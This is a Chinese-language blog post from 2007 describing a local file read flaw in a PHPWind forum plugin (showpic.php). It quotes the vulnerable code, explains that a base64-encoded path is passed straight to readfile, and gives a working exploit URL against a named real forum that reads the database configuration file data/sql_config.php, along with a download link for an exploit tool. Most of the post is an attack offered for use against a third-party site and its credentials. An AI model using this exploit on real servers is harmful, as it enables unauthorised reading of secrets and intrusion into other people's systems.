数据加载中……
登 陆
我的分类(专题)
数据加载中……
链接
数据加载中……
Blog信息
数据加载中……
PHPWind 论坛 (showpic.php)插件 本地读取漏洞
樱木花盗 发表于 2007-5-14 6:08:32
From :
漏洞文件:
showpic.php
str=$_SERVER['QUERY_STRING'];
$img=base64_decode($str);
$codelen=strlen($safeguard);//获取附加码长度
$img=substr($img,$codelen); //去掉附加码
readfile($img);
提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容
漏洞利用方式:
http://bbs.5617.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==
然后查看源文件。
这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 是路径data/sql_config.php的BASE64编码。
你也可以改为其他路径文件的。BASE64编码就可以看到文件内容了。
500){this.resized=true;this.style.width=500;}"> 590)?'590px':'auto'; }" alt=uploads/200705/10_234501_3a4848a85acf4d65b71b17ff4fcec0a7.jpg src="http://www.4evil.org/uploads/200705/10_234501_3a4848a85acf4d65b71b17ff4fcec0a7.jpg">
另外放上精灵总写的工具。
方便吧。
下载地址:
http://www.spr1t3.com/tools/PW_showpic.rar
500){this.resized=true;this.style.width=500;}"> 590)?'590px':'auto'; }" alt=uploads/200705/10_234613_expphpwind.jpg src="http://www.4evil.org/uploads/200705/10_234613_expphpwind.jpg">
阅读全文
|
回复(0)
|
引用通告
|
编辑
上一篇:
[原创]Echo出终端端口号
下一篇:
一次完全利用社会工程学的域名劫持攻击
发表评论:
昵称:
密码:
(游客无须输入密码)
主页:
标题:
数据加载中……